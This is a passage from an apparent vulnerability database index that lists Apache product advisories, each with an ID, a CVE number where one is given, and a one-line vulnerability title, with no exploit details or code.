9460| [95429] Apache Groovy CVE-2016-6814 Remote Code Execution Vulnerability
9461| [95335] Apache Hadoop CVE-2016-3086 Information Disclosure Vulnerability
9462| [95168] Apache Wicket CVE-2016-6793 Denial of Service Vulnerability
9463| [95136] Apache Qpid Broker for Java CVE-2016-8741 Remote Information Disclosure Vulnerability
9464| [95078] Apache HTTP Server CVE-2016-0736 Remote Security Vulnerability
9465| [95077] Apache HTTP Server CVE-2016-8743 Security Bypass Vulnerability
9466| [95076] Apache HTTP Server CVE-2016-2161 Denial of Service Vulnerability
9467| [95020] Apache Tika CVE-2015-3271 Remote Information Disclosure Vulnerability
9468| [94950] Apache Hadoop CVE-2016-5001 Local Information Disclosure Vulnerability
9469| [94882] Apache ActiveMQ CVE-2016-6810 HTML Injection Vulnerability
9470| [94828] Apache Tomcat CVE-2016-8745 Information Disclosure Vulnerability
9471| [94766] Apache CouchDB CVE-2016-8742 Local Privilege Escalation Vulnerability
9472| [94657] Apache Struts CVE-2016-8738 Denial of Service Vulnerability
9473| [94650] Apache HTTP Server CVE-2016-8740 Denial of Service Vulnerability
9474| [94588] Apache Subversion CVE-2016-8734 XML External Entity Denial of Service Vulnerability
9475| [94513] Apache Karaf CVE-2016-8648 Remote Code Execution Vulnerability
9476| [94463] Apache Tomcat CVE-2016-8735 Remote Code Execution Vulnerability
9477| [94462] Apache Tomcat CVE-2016-6817 Denial of Service Vulnerability
9478| [94461] Apache Tomcat CVE-2016-6816 Security Bypass Vulnerability
9479| [94418] Apache OpenOffice CVE-2016-6803 Local Privilege Escalation Vulnerability
9480| [94247] Apache Tika CVE-2016-6809 Remote Code Execution Vulnerability
9481| [94221] Apache Ranger CVE-2016-6815 Local Privilege Escalation Vulnerability
9482| [94145] Apache OpenMeetings CVE-2016-8736 Remote Code Execution Vulnerability
9483| [93945] Apache CloudStack CVE-2016-6813 Authorization Bypass Vulnerability
9484| [93944] Apache Tomcat Security Manager CVE-2016-6796 Security Bypass Vulnerability
9485| [93943] Apache Tomcat CVE-2016-6794 Security Bypass Vulnerability
9486| [93942] Apache Tomcat Security Manager CVE-2016-5018 Security Bypass Vulnerability
9487| [93940] Apache Tomcat CVE-2016-6797 Security Bypass Vulnerability
9488| [93939] Apache Tomcat CVE-2016-0762 Information Disclosure Vulnerability
9489| [93774] Apache OpenOffice CVE-2016-6804 DLL Loading Remote Code Execution Vulnerability
9490| [93773] Apache Struts CVE-2016-6795 Directory Traversal Vulnerability
9491| [93478] Apache Tomcat CVE-2016-6325 Local Privilege Escalation Vulnerability
9492| [93472] Apache Tomcat CVE-2016-5425 Insecure File Permissions Vulnerability
9493| [93429] Apache Tomcat JK Connector CVE-2016-6808 Remote Buffer Overflow Vulnerability
9494| [93263] Apache Tomcat CVE-2016-1240 Local Privilege Escalation Vulnerability
9495| [93236] Apache MyFaces Trinidad CVE-2016-5019 Remote Code Execution Vulnerability
9496| [93142] Apache ActiveMQ Artemis CVE-2016-4978 Remote Code Execution Vulnerability
9497| [93132] Apache Derby CVE-2015-1832 XML External Entity Information Disclosure Vulnerability
9498| [93044] Apache Zookeeper CVE-2016-5017 Buffer Overflow Vulnerability
9499| [92966] Apache Jackrabbit CVE-2016-6801 Cross-Site Request Forgery Vulnerability
9500| [92947] Apache Shiro CVE-2016-6802 Remote Security Bypass Vulnerability
9501| [92905] Apache CXF Fediz CVE-2016-4464 Security Bypass Vulnerability
9502| [92577] Apache Ranger CVE-2016-5395 HTML Injection Vulnerability
9503| [92331] Apache HTTP Server CVE-2016-1546 Remote Denial of Service Vulnerability
9504| [92328] Apache Hive CVE-2016-0760 Multiple Remote Code Execution Vulnerabilities
9505| [92320] Apache APR-util and httpd CVE-2016-6312 Denial of Service Vulnerability
9506| [92100] Apache POI CVE-2016-5000 XML External Entity Injection Vulnerability
9507| [92079] Apache OpenOffice CVE-2016-1513 Remote Code Execution Vulnerability
9508| [91818] Apache Tomcat CVE-2016-5388 Security Bypass Vulnerability
9509| [91816] Apache HTTP Server CVE-2016-5387 Security Bypass Vulnerability
9510| [91788] Apache Qpid Proton CVE-2016-4467 Certificate Verification Security Bypass Vulnerability
9511| [91738] Apache XML-RPC CVE-2016-5003 Remote Code Execution Vulnerability
9512| [91736] Apache XML-RPC Multiple Security Vulnerabilities
9513| [91707] Apache Archiva CVE-2016-5005 HTML Injection Vulnerability
9514| [91703] Apache Archiva CVE-2016-4469 Multiple Cross-Site Request Forgery Vulnerabilities
9515| [91566] Apache HTTP Server CVE-2016-4979 Authentication Bypass Vulnerability
9516| [91537] Apache QPID CVE-2016-4974 Deserialization Security Bypass Vulnerability
9517| [91501] Apache Xerces-C CVE-2016-4463 Stack Buffer Overflow Vulnerability
9518| [91453] Apache Commons FileUpload CVE-2016-3092 Denial Of Service Vulnerability
9519| [91284] Apache Struts CVE-2016-4431 Security Bypass Vulnerability
9520| [91282] Apache Struts CVE-2016-4433 Security Bypass Vulnerability
9521| [91281] Apache Struts CVE-2016-4430 Cross-Site Request Forgery Vulnerability
9522| [91280] Apache Struts CVE-2016-4436 Security Bypass Vulnerability
9523| [91278] Apache Struts CVE-2016-4465 Denial of Service Vulnerability
9524| [91277] Apache Struts Incomplete Fix Remote Code Execution Vulnerability
9525| [91275] Apache Struts CVE-2016-4438 Remote Code Execution Vulnerability
9526| [91217] Apache Continuum 'saveInstallation.action' Command Execution Vulnerability
9527| [91141] Apache CloudStack CVE-2016-3085 Authentication Bypass Vulnerability
9528| [91068] Apache Struts CVE-2016-1181 Remote Code Execution Vulnerability
9529| [91067] Apache Struts CVE-2016-1182 Security Bypass Vulnerability
9530| [91024] Apache Shiro CVE-2016-4437 Information Disclosure Vulnerability
9531| [90988] Apache Ranger CVE-2016-2174 SQL Injection Vulnerability
9532| [90961] Apache Struts CVE-2016-3093 Denial of Service Vulnerability
9533| [90960] Apache Struts CVE-2016-3087 Remote Code Execution Vulnerability
9534| [90921] Apache Qpid CVE-2016-4432 Authentication Bypass Vulnerability
9535| [90920] Apache Qpid CVE-2016-3094 Denial of Service Vulnerability
9536| [90902] Apache PDFBox CVE-2016-2175 XML External Entity Injection Vulnerability
9537| [90897] Apache Tika CVE-2016-4434 XML External Entity Injection Vulnerability
9538| [90827] Apache ActiveMQ CVE-2016-3088 Multiple Arbitrary File Upload Vulnerabilities
9539| [90755] Apache Ambari CVE-2016-0707 Multiple Local Information Disclosure Vulnerabilities
9540| [90482] Apache CVE-2004-1387 Local Security Vulnerability
9541| [89762] Apache CVE-2001-1556 Remote Security Vulnerability
9542| [89417] Apache Subversion CVE-2016-2167 Authentication Bypass Vulnerability
9543| [89326] RETIRED: Apache Subversion CVE-2016-2167 Security Bypass Vulnerability
9544| [89320] Apache Subversion CVE-2016-2168 Remote Denial of Service Vulnerability
9545| [88826] Apache Struts CVE-2016-3082 Remote Code Execution Vulnerability
9546| [88797] Apache Cordova For iOS CVE-2015-5208 Arbitrary Code Execution Vulnerability
9547| [88764] Apache Cordova iOS CVE-2015-5207 Multiple Security Bypass Vulnerabilities
9548| [88701] Apache CVE-2001-1449 Remote Security Vulnerability
9549| [88635] Apache CVE-2000-1204 Remote Security Vulnerability
9550| [88590] Apache WWW server CVE-1999-1199 Denial-Of-Service Vulnerability
9551| [88496] Apache CVE-2000-1206 Remote Security Vulnerability
9552| [87828] Apache CVE-1999-1237 Remote Security Vulnerability
9553| [87784] Apache CVE-1999-1293 Denial-Of-Service Vulnerability
9554| [87327] Apache Struts CVE-2016-3081 Remote Code Execution Vulnerability
9555| [86622] Apache Stats CVE-2007-0975 Remote Security Vulnerability
9556| [86399] Apache CVE-2007-1743 Local Security Vulnerability
9557| [86397] Apache CVE-2007-1742 Local Security Vulnerability
9558| [86311] Apache Struts CVE-2016-4003 Cross Site Scripting Vulnerability
9559| [86174] Apache Wicket CVE-2015-5347 Cross Site Scripting Vulnerability
9560| [85971] Apache OFBiz CVE-2016-2170 Java Deserialization Remote Code Execution Vulnerability
9561| [85967] Apache OFBiz CVE-2015-3268 HTML Injection Vulnerability
9562| [85759] Apache Jetspeed CVE-2016-2171 Unauthorized Access Vulnerability
9563| [85758] Apache Jetspeed CVE-2016-0712 Cross Site Scripting Vulnerability
9564| [85756] Apache Jetspeed CVE-2016-0710 Multiple SQL Injection Vulnerabilities
9565| [85755] Apache Jetspeed CVE-2016-0711 Mulitple HTML Injection Vulnerabilities
9566| [85754] Apache Jetspeed CVE-2016-0709 Directory Traversal Vulnerability
9567| [85730] Apache Subversion CVE-2015-5343 Integer Overflow Vulnerability
9568| [85691] Apache Ranger CVE-2016-0735 Security Bypass Vulnerability
9569| [85578] Apache ActiveMQ CVE-2010-1244 Cross-Site Request Forgery Vulnerability
9570| [85554] Apache OpenMeetings CVE-2016-2164 Multiple Information Disclosure Vulnerabilities
9571| [85553] Apache OpenMeetings CVE-2016-0783 Information Disclosure Vulnerability
9572| [85552] Apache OpenMeetings CVE-2016-2163 HTML Injection Vulnerability
9573| [85550] Apache OpenMeetings CVE-2016-0784 Directory Traversal Vulnerability
9574| [85386] Apache Hadoop CVE-2015-7430 Local Privilege Escalation Vulnerability
9575| [85377] Apache Qpid Proton Python API CVE-2016-2166 Man in the Middle Security Bypass Vulnerability
9576| [85205] Apache Solr CVE-2015-8796 Cross Site Scripting Vulnerability
9577| [85203] Apache Solr CVE-2015-8795 Mulitple HTML Injection Vulnerabilities
9578| [85163] Apache Geronimo CVE-2008-0732 Local Security Vulnerability
9579| [85131] Apache Struts 'TextParseUtil.translateVariables()' Method Remote Code Execution Vulnerability
9580| [85070] Apache Struts CVE-2016-2162 Cross Site Scripting Vulnerability
9581| [85066] Apache Struts CVE-2016-0785 Remote Code Execution Vulnerability
9582| [84422] Apache TomEE CVE-2016-0779 Unspecified Security Vulnerability
9583| [84321] Apache ActiveMQ CVE-2016-0734 Clickjacking Vulnerability
9584| [84316] Apache ActiveMQ CVE-2016-0782 Multiple Cross Site Scripting Vulnerabilities
9585| [83910] Apache Wicket CVE-2015-7520 Cross Site Scripting Vulnerability
9586| [83423] Apache Xerces-C CVE-2016-0729 Buffer Overflow Vulnerability
9587| [83330] Apache Tomcat CVE-2015-5351 Cross Site Request Forgery Vulnerability
9588| [83329] Apache Tomcat CVE-2015-5174 Directory Traversal Vulnerability
9589| [83328] Apache Tomcat CVE-2015-5345 Directory Traversal Vulnerability
9590| [83327] Apache Tomcat Security Manager CVE-2016-0714 Remote Code Execution Vulnerability
9591| [83326] Apache Tomcat CVE-2016-0763 Security Bypass Vulnerability
9592| [83324] Apache Tomcat Security Manager CVE-2016-0706 Information Disclosure Vulnerability
9593| [83323] Apache Tomcat CVE-2015-5346 Session Fixation Vulnerability
9594| [83259] Apache Hadoop CVE-2015-1776 Information Disclosure Vulnerability
9595| [83243] Apache Solr CVE-2015-8797 Cross Site Scripting Vulnerability
9596| [83119] Apache Sling CVE-2016-0956 Information Disclosure Vulnerability
9597| [83002] Apache CVE-2000-1205 Cross-Site Scripting Vulnerability
9598| [82871] Apache Ranger Authentication Bypass and Security Bypass Vulnerabilities
9599| [82800] Apache CloudStack CVE-2015-3251 Information Disclosure Vulnerability
9600| [82798] Apache CloudStack CVE-2015-3252 Authentication Bypass Vulnerability
9601| [82732] Apache Gallery CVE-2003-0771 Local Security Vulnerability
9602| [82676] Apache CVE-2003-1581 Cross-Site Scripting Vulnerability
9603| [82550] Apache Struts CVE-2015-5209 Security Bypass Vulnerability
9604| [82300] Apache Subversion CVE-2015-5259 Integer Overflow Vulnerability
9605| [82260] Apache Camel CVE-2015-5344 Remote Code Execution Vulnerability
9606| [82234] Apache Hive CVE-2015-7521 Security Bypass Vulnerability
9607| [82082] Apache CVE-1999-0289 Remote Security Vulnerability
9608| [81821] Apache Distribution for Solaris CVE-2007-2080 SQL-Injection Vulnerability
9609| [80696] Apache Camel CVE-2015-5348 Information Disclosure Vulnerability
9610| [80525] Apache CVE-2003-1580 Remote Security Vulnerability
9611| [80354] Drupal Apache Solr Search Module Access Bypass Vulnerability
9612| [80193] Apache CVE-1999-0107 Denial-Of-Service Vulnerability
9613| [79812] Apache Directory Studio CVE-2015-5349 Command Injection Vulnerability
9614| [79744] Apache HBase CVE-2015-1836 Unauthorized Access Vulnerability
9615| [79204] Apache TomEE 'EjbObjectInputStream' Remote Code Execution Vulnerability
9616| [77679] Apache Cordova For Android CVE-2015-8320 Weak Randomization Security Bypass Vulnerability
9617| [77677] Apache Cordova For Android CVE-2015-5256 Security Bypass Vulnerability
9618| [77591] Apache CXF SAML SSO Processing CVE-2015-5253 Security Bypass Vulnerability
9619| [77521] Apache Commons Collections 'InvokerTransformer.java' Remote Code Execution Vulnerability
9620| [77110] Apache HttpComponents HttpClient CVE-2015-5262 Denial of Service Vulnerability
9621| [77086] Apache Ambari CVE-2015-1775 Server Side Request Forgery Security Bypass Vulnerability
9622| [77085] Apache Ambari CVE-2015-3270 Remote Privilege Escalation Vulnerability
9623| [77082] Apache Ambari 'targetURI' Parameter Open Redirection Vulnerability
9624| [77059] Apache Ambari CVE-2015-3186 Cross Site Scripting Vulnerability
9625| [76933] Apache James Server Unspecified Command Execution Vulnerability
9626| [76832] Apache cordova-plugin-file-transfer CVE-2015-5204 HTTP Header Injection Vulnerability
9627| [76625] Apache Struts CVE-2015-5169 Cross Site Scripting Vulnerability
9628| [76624] Apache Struts CVE-2015-2992 Cross Site Scripting Vulnerability
9629| [76522] Apache Tapestry CVE-2014-1972 Security Bypass Vulnerability
9630| [76486] Apache CXF Fediz CVE-2015-5175 Denial of Service Vulnerability
9631| [76452] Apache ActiveMQ CVE-2015-1830 Directory Traversal Vulnerability
9632| [76446] Apache Subversion 'libsvn_fs_fs/tree.c' Denial of Service Vulnerability
9633| [76274] Apache Subversion CVE-2015-3184 Information Disclosure Vulnerability
9634| [76273] Apache Subversion CVE-2015-3187 Information Disclosure Vulnerability
9635| [76272] Apache ActiveMQ CVE-2014-3576 Denial of Service Vulnerability
9636| [76221] Apache Ranger CVE-2015-0266 Access Bypass Vulnerability
9637| [76208] Apache Ranger CVE-2015-0265 JavaScript Code Injection Vulnerability
9638| [76025] Apache ActiveMQ Artemis CVE-2015-3208 XML External Entity Information Disclosure Vulnerability
9639| [75965] Apache HTTP Server CVE-2015-3185 Security Bypass Vulnerability
9640| [75964] Apache HTTP Server CVE-2015-0253 Remote Denial of Service Vulnerability
9641| [75963] Apache HTTP Server CVE-2015-3183 Security Vulnerability
9642| [75940] Apache Struts CVE-2015-1831 Security Bypass Vulnerability
9643| [75919] Apache Groovy CVE-2015-3253 Remote Code Execution Vulnerability
9644| [75338] Apache Storm CVE-2015-3188 Remote Code Execution Vulnerability
9645| [75275] Drupal Apache Solr Real-Time Module Access Bypass Vulnerability
9646| [74866] Apache Cordova For Android CVE-2015-1835 Security Bypass Vulnerability
9647| [74839] Apache Sling API and Sling Servlets CVE-2015-2944 Cross Site Scripting Vulnerability
9648| [74761] Apache Jackrabbit CVE-2015-1833 XML External Entity Information Disclosure Vulnerability
9649| [74686] Apache Ambari '/var/lib/ambari-server/ambari-env.sh' Local Privilege Escalation Vulnerability
9650| [74665] Apache Tomcat CVE-2014-7810 Security Bypass Vulnerability
9651| [74475] Apache Tomcat CVE-2014-0230 Denial of Service Vulnerability
9652| [74423] Apache Struts CVE-2015-0899 Security Bypass Vulnerability
9653| [74338] Apache OpenOffice HWP Filter Memory Corruption Vulnerability
9654| [74265] Apache Tomcat 'mod_jk' CVE-2014-8111 Information Disclosure Vulnerability
9655| [74260] Apache Subversion CVE-2015-0248 Multiple Denial of Service Vulnerabilities
9656| [74259] Apache Subversion 'deadprops.c' Security Bypass Vulnerability
9657| [74204] PHP 'sapi/apache2handler/sapi_apache2.c' Remote Code Execution Vulnerability
9658| [74158] Apache HTTP Server 'protocol.c' Remote Denial of Service Vulnerability
9659| [73954] Apache Flex 'asdoc/templates/index.html' Cross Site Scripting Vulnerability
9660| [73851] Apache2 CVE-2012-0216 Cross-Site Scripting Vulnerability
9661| [73478] Apache Cassandra CVE-2015-0225 Remote Code Execution Vulnerability
9662| [73041] Apache HTTP Server 'mod_lua' Module Denial of Service Vulnerability
9663| [73040] Apache HTTP Server 'mod_lua.c' Local Access Bypass Vulnerability
9664| [72809] Apache Standard Taglibs CVE-2015-0254 XML External Entity Injection Vulnerability
9665| [72717] Apache Tomcat CVE-2014-0227 Chunk Request Remote Denial Of Service Vulnerability
9666| [72557] Apache WSS4J CVE-2015-0227 Security Bypass Vulnerability
9667| [72553] Apache WSS4J CVE-2015-0226 Information Disclosure Vulnerability
9668| [72513] Apache ActiveMQ CVE-2014-3612 LDAP Authentication Bypass Vulnerability
9669| [72511] Apache ActiveMQ CVE-2014-8110 Multiple Cross Site Scripting Vulnerabilities
9670| [72510] Apache ActiveMQ CVE-2014-3600 XML External Entity Injection Vulnerability
9671| [72508] Apache ActiveMQ Apollo CVE-2014-3579 XML External Entity Injection Vulnerability
9672| [72319] Apache Qpid CVE-2015-0223 Security Bypass Vulnerability
9673| [72317] Apache Qpid CVE-2015-0224 Incomplete Fix Multiple Denial of Service Vulnerabilities
9674| [72115] Apache Santuario 'XML Signature Verification' Security Bypass Vulnerability
9675| [72053] Apache HTTP Server 'mod_remoteip.c' IP Address Spoofing Vulnerability
9676| [72030] Apache Qpid CVE-2015-0203 Multiple Denial of Service Vulnerabilities
9677| [71879] Apache Traffic Server 'HttpTransact.cc' Denial of Service Vulnerability
9678| [71726] Apache Subversion CVE-2014-3580 Remote Denial of Service Vulnerability
9679| [71725] Apache Subversion CVE-2014-8108 Remote Denial of Service Vulnerability
9680| [71657] Apache HTTP Server 'mod_proxy_fcgi' Module Denial of Service Vulnerability
9681| [71656] Apache HTTP Server 'mod_cache' Module Denial of Service Vulnerability
9682| [71548] Apache Struts CVE-2014-7809 Security Bypass Vulnerability
9683| [71466] Apache Hadoop CVE-2014-3627 Information Disclosure Vulnerability
9684| [71353] Apache HTTP Server 'LuaAuthzProvider' Authorization Bypass Vulnerability
9685| [71004] Apache Qpid CVE-2014-3629 XML External Entity Injection Vulnerability
9686| [70970] Apache Traffic Server Cross Site Scripting Vulnerability
9687| [70738] Apache CXF CVE-2014-3584 Denial of Service Vulnerability
9688| [70736] Apache CXF SAML SubjectConfirmation Security Bypass Vulnerability
9689| [69728] Apache Tomcat CVE-2013-4444 Arbitrary File Upload Vulnerability
9690| [69648] Apache POI CVE-2014-3574 Denial Of Service Vulnerability
9691| [69647] Apache POI OpenXML parser CVE-2014-3529 XML External Entity Information Disclosure Vulnerability
9692| [69351] Apache OpenOffice Calc CVE-2014-3524 Command Injection Vulnerability
9693| [69295] Apache Axis Incomplete Fix CVE-2014-3596 SSL Certificate Validation Security Bypass Vulnerability
9694| [69286] Apache OFBiz CVE-2014-0232 Multiple Cross Site Scripting Vulnerabilities
9695| [69258] Apache HttpComponents Incomplete Fix CVE-2014-3577 SSL Validation Security Bypass Vulnerability
9696| [69257] Apache HttpComponents Incomplete Fix SSL Certificate Validation Security Bypass Vulnerability
9697| [69248] Apache HTTP Server CVE-2013-4352 Remote Denial of Service Vulnerability
9698| [69237] Apache Subversion CVE-2014-3522 SSL Certificate Validation Information Disclosure Vulnerability
9699| [69173] Apache Traffic Server CVE-2014-3525 Unspecified Security Vulnerability
9700| [69046] Apache Cordova For Android CVE-2014-3502 Information Disclosure Vulnerability
9701| [69041] Apache Cordova For Android CVE-2014-3501 Security Bypass Vulnerability
9702| [69038] Apache Cordova For Android CVE-2014-3500 Security Bypass Vulnerability
9703| [68995] Apache Subversion CVE-2014-3528 Insecure Authentication Weakness
9704| [68966] Apache Subversion 'irkerbridge.py' Local Privilege Escalation Vulnerability
9705| [68965] Apache Subversion 'svnwcsub.py' Local Privilege Escalation Vulnerability
9706| [68863] Apache HTTP Server 'mod_cache' Module Remote Denial of Service Vulnerability
9707| [68747] Apache HTTP Server CVE-2014-3523 Remote Denial of Service Vulnerability
9708| [68745] Apache HTTP Server CVE-2014-0118 Remote Denial of Service Vulnerability
9709| [68742] Apache HTTP Server CVE-2014-0231 Remote Denial of Service Vulnerability
9710| [68740] Apache HTTP Server CVE-2014-0117 Remote Denial of Service Vulnerability
9711| [68678] Apache HTTP Server 'mod_status' CVE-2014-0226 Remote Code Execution Vulnerability
9712| [68445] Apache CXF UsernameToken Information Disclosure Vulnerability
9713| [68441] Apache CXF SAML Tokens Validation Security Bypass Vulnerability
9714| [68431] Apache Syncope CVE-2014-3503 Insecure Password Generation Weakness
9715| [68229] Apache Harmony PRNG Entropy Weakness
9716| [68111] Apache 'mod_wsgi' Module Privilege Escalation Vulnerability
9717| [68072] Apache Tomcat CVE-2014-0186 Remote Denial of Service Vulnerability
9718| [68039] Apache Hive CVE-2014-0228 Security Bypass Vulnerability
9719| [67673] Apache Tomcat CVE-2014-0095 AJP Request Remote Denial Of Service Vulnerability
9720| [67671] Apache Tomcat CVE-2014-0075 Chunk Request Remote Denial Of Service Vulnerability
9721| [67669] Apache Tomcat CVE-2014-0119 XML External Entity Information Disclosure Vulnerability
9722| [67668] Apache Tomcat CVE-2014-0099 Request Processing Information Disclosure Vulnerability
9723| [67667] Apache Tomcat CVE-2014-0096 XML External Entity Information Disclosure Vulnerability
9724| [67534] Apache 'mod_wsgi' Module CVE-2014-0242 Information Disclosure Vulnerability
9725| [67532] Apache 'mod_wsgi' Module Local Privilege Escalation Vulnerability
9726| [67530] Apache Solr Search Template Cross Site Scripting Vulnerability
9727| [67236] Apache CXF CVE-2014-0109 Remote Denial of Service Vulnerability
9728| [67232] Apache CXF CVE-2014-0110 Denial of Service Vulnerability
9729| [67121] Apache Struts ClassLoader Manipulation CVE-2014-0114 Security Bypass Vulnerability
9730| [67081] Apache Struts 'getClass()' Method Security Bypass Vulnerability
9731| [67064] Apache Struts ClassLoader Manipulation Incomplete Fix Security Bypass Vulnerability
9732| [67013] Apache Zookeeper CVE-2014-0085 Local Information Disclosure Vulnerability
9733| [66998] Apache Archiva CVE-2013-2187 Unspecified Cross Site Scripting Vulnerability
9734| [66991] Apache Archiva CVE-2013-2187 HTML Injection Vulnerability
9735| [66927] Apache Syncope CVE-2014-0111 Remote Code Execution Vulnerability
9736| [66474] Apache CouchDB Universally Unique IDentifier (UUID) Remote Denial of Service Vulnerability
9737| [66397] Apache Xalan-Java Library CVE-2014-0107 Security Bypass Vulnerability
9738| [66303] Apache HTTP Server Multiple Denial of Service Vulnerabilities
9739| [66041] RETIRED: Apache Struts CVE-2014-0094 Classloader Manipulation Security Bypass Vulnerability
9740| [65999] Apache Struts ClassLoader Manipulation CVE-2014-0094 Security Bypass Vulnerability
9741| [65967] Apache Cordova File-Transfer Unspecified Security Vulnerability
9742| [65959] Apache Cordova InAppBrowser Remote Privilege Escalation Vulnerability
9743| [65935] Apache Shiro 'login.jsp' Authentication Bypass Vulnerability
9744| [65902] Apache Camel CVE-2014-0003 Remote Code Execution Vulnerability
9745| [65901] Apache Camel CVE-2014-0002 XML External Entity Information Disclosure Vulnerability
9746| [65773] Apache Tomcat CVE-2013-4286 Security Bypass Vulnerability
9747| [65769] Apache Tomcat CVE-2014-0033 Session Fixation Vulnerability
9748| [65768] Apache Tomcat CVE-2013-4590 XML External Entity Information Disclosure Vulnerability
9749| [65767] Apache Tomcat CVE-2013-4322 Incomplete Fix Denial of Service Vulnerability
9750| [65615] Apache ActiveMQ 'refresh' Parameter Cross Site Scripting Vulnerability
9751| [65434] Apache Subversion 'mod_dav_svn' Module SVNListParentPath Denial of Service Vulnerability
9752| [65431] Apache Wicket CVE-2013-2055 Information Disclosure Vulnerability
9753| [65400] Apache Commons FileUpload CVE-2014-0050 Denial Of Service Vulnerability
9754| [64782] Apache CloudStack Virtual Router Component Security Bypass Vulnerability
9755| [64780] Apache CloudStack Unauthorized Access Vulnerability
9756| [64617] Apache Libcloud Digital Ocean API Local Information Disclosure Vulnerability
9757| [64437] Apache Santuario XML Security For JAVA XML Signature Denial of Service Vulnerability
9758| [64427] Apache Solr Multiple XML External Entity Injection Vulnerabilities
9759| [64009] Apache Solr CVE-2013-6408 XML External Entity Injection Vulnerability
9760| [64008] Apache Solr CVE-2013-6407 XML External Entity Injection Vulnerability
9761| [63981] Apache Subversion 'mod_dav_svn' Module Denial of Service Vulnerability
9762| [63966] Apache Subversion CVE-2013-4505 Security Bypass Vulnerability
9763| [63963] Apache Roller CVE-2013-4171 Cross Site Scripting Vulnerability
9764| [63935] Apache Solr 'SolrResourceLoader' Directory Traversal Vulnerability
9765| [63928] Apache Roller CVE-2013-4212 OGNL Expression Injection Remote Code Execution Vulnerability
9766| [63515] Apache Tomcat Manager Component CVE-2013-6357 Cross Site Request Forgery Vulnerability
9767| [63403] Apache Struts Multiple Cross Site Scripting Vulnerabilities
9768| [63400] Apache 'mod_pagespeed' Module Unspecified Cross Site Scripting Vulnerability
9769| [63260] Apache Shindig CVE-2013-4295 XML External Entity Information Disclosure Vulnerability
9770| [63241] Apache Sling 'AbstractAuthenticationFormServlet' Open Redirection Vulnerability
9771| [63174] Apache Commons FileUpload 'DiskFileItem' Class Null Byte Arbitrary File Write Vulnerability
9772| [62939] Apache 'mod_fcgid' Module CVE-2013-4365 Heap Buffer Overflow Vulnerability
9773| [62903] Apache Sling 'deepGetOrCreateNode()' Function Denial Of Service Vulnerability
9774| [62706] Apache Camel CVE-2013-4330 Information Disclosure Vulnerability
9775| [62677] Apache 'mod_accounting' Module CVE-2013-5697 SQL Injection Vulnerability
9776| [62674] TYPO3 Apache Solr Unspecified Cross Site Scripting and PHP Code Execution Vulnerabilities
9777| [62587] Apache Struts CVE-2013-4316 Remote Code Execution Vulnerability
9778| [62584] Apache Struts CVE-2013-4310 Security Bypass Vulnerability
9779| [62266] Apache Subversion CVE-2013-4277 Insecure Temporary File Creation Vulnerability
9780| [61984] Apache Hadoop RPC Authentication CVE-2013-2192 Man in the Middle Security Bypass Vulnerability
9781| [61981] Apache HBase RPC Authentication Man In The Middle Security Bypass Vulnerability
9782| [61638] Apache CloudStack CVE-2013-2136 Multiple Cross Site Scripting Vulnerabilities
9783| [61454] Apache Subversion CVE-2013-4131 Denial Of Service Vulnerability
9784| [61379] Apache HTTP Server CVE-2013-2249 Unspecified Remote Security Vulnerability
9785| [61370] Apache OFBiz CVE-2013-2317 'View Log' Cross Site Scripting Vulnerability
9786| [61369] Apache OFBiz Nested Expression Remote Code Execution Vulnerability
9787| [61196] Apache Struts CVE-2013-2248 Multiple Open Redirection Vulnerabilities
9788| [61189] Apache Struts CVE-2013-2251 Multiple Remote Command Execution Vulnerabilities
9789| [61129] Apache HTTP Server CVE-2013-1896 Remote Denial of Service Vulnerability
9790| [61030] Apache CXF CVE-2013-2160 Multiple Remote Denial of Service Vulnerabilities
9791| [60875] Apache Geronimo RMI Classloader Security Bypass Vulnerability
9792| [60846] Apache Santuario XML Security for JAVA XML Signature CVE-2013-2172 Security Bypass Vulnerability
9793| [60817] Apache Santuario XML Security for C++ CVE-2013-2210 Heap Buffer Overflow Vulnerability
9794| [60800] Apache Qpid Python Client SSL Certificate Verification Information Disclosure Vulnerability
9795| [60599] Apache Santuario XML Security for C++ CVE-2013-2156 Remote Heap Buffer Overflow Vulnerability
9796| [60595] Apache Santuario XML Security for C++ XML Signature CVE-2013-2155 Denial of Service Vulnerability
9797| [60594] Apache Santuario XML Security for C++ CVE-2013-2154 Stack Buffer Overflow Vulnerability
9798| [60592] Apache Santuario XML Security for C++ XML Signature CVE-2013-2153 Security Bypass Vulnerability
9799| [60534] Apache OpenJPA Object Deserialization Arbitrary File Creation or Overwrite Vulnerability
9800| [60346] Apache Struts CVE-2013-2134 OGNL Expression Injection Vulnerability
9801| [60345] Apache Struts CVE-2013-2135 OGNL Expression Injection Vulnerability
9802| [60267] Apache Subversion CVE-2013-1968 Remote Denial of Service Vulnerability
9803| [60265] Apache Subversion CVE-2013-2088 Command Injection Vulnerability
9804| [60264] Apache Subversion CVE-2013-2112 Remote Denial of Service Vulnerability
9805| [60187] Apache Tomcat DIGEST Authentication CVE-2013-2051 Incomplete Fix Security Weakness
9806| [60186] Apache Tomcat CVE-2013-1976 Insecure Temporary File Handling Vulnerability
9807| [60167] Apache Struts 'includeParams' CVE-2013-2115 Incomplete Fix Security Bypass Vulnerability
9808| [60166] Apache Struts 'includeParams' CVE-2013-1966 Security Bypass Vulnerability
9809| [60082] Apache Struts 'ParameterInterceptor' Class OGNL CVE-2013-1965 Security Bypass Vulnerability
9810| [59826] Apache HTTP Server Terminal Escape Sequence in Logs Command Injection Vulnerability
9811| [59799] Apache Tomcat CVE-2013-2067 Session Fixation Vulnerability
9812| [59798] Apache Tomcat CVE-2013-2071 Information Disclosure Vulnerability
9813| [59797] Apache Tomcat CVE-2012-3544 Denial of Service Vulnerability
9814| [59670] Apache VCL Multiple Input Validation Vulnerabilities
9815| [59464] Apache CloudStack CVE-2013-2758 Hash Information Disclosure Vulnerability
9816| [59463] Apache CloudStack CVE-2013-2756 Authentication Bypass Vulnerability
9817| [59402] Apache ActiveMQ CVE-2013-3060 Information Disclosure and Denial of Service Vulnerability
9818| [59401] Apache ActiveMQ CVE-2012-6551 Denial of Service Vulnerability
9819| [59400] Apache ActiveMQ CVE-2012-6092 Multiple Cross Site Scripting Vulnerabilities
9820| [58898] Apache Subversion CVE-2013-1884 Remote Denial of Service Vulnerability
9821| [58897] Apache Subversion 'mod_dav_svn/lock.c' Remote Denial of Service Vulnerability
9822| [58895] Apache Subversion 'mod_dav_svn' Remote Denial of Service Vulnerability
9823| [58455] Apache Rave User RPC API CVE-2013-1814 Information Disclosure Vulnerability
9824| [58379] Apache Qpid CVE-2012-4446 Authentication Bypass Vulnerability
9825| [58378] Apache Qpid CVE-2012-4460 Denial of Service Vulnerability
